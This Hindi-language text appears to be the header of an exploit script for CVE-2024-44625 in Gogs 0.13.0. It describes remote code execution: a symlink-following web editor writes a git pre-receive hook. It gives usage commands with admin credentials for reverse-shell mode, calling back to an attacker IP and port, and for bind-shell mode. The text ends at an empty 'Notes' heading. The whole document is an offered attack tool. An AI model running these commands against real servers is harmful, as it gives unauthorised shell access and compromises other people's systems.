
CVE-2024-44625 के लिए एक्सप्लॉइट Gogs 0.13.0 में, सिमलिंक-फॉलो के माध्यम से रिमोट कोड एक्ज़ीक्यूशन प्राप्त करके git हुक बनाना, रिवर्स और बाइंड शेल मोड के साथ।
रिवर्स प्रॉक्सी के पीछे 0.13.0-युग के Gogs के विरुद्ध मान्य किया गया। प्रिमिटिव: वेब एडिटर सिमलिंक-फॉलो करके एक अनुपस्थित .git/hooks/pre-receive फ़ाइल बनाता है (निष्पादन योग्य)। उसके बाद रिपॉजिटरी में हर पुश उसे चलाता है।
उपयोग:
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost <YOUR_IP> --lport 4444
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode bind --bind-port 5555
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3
नोट्स: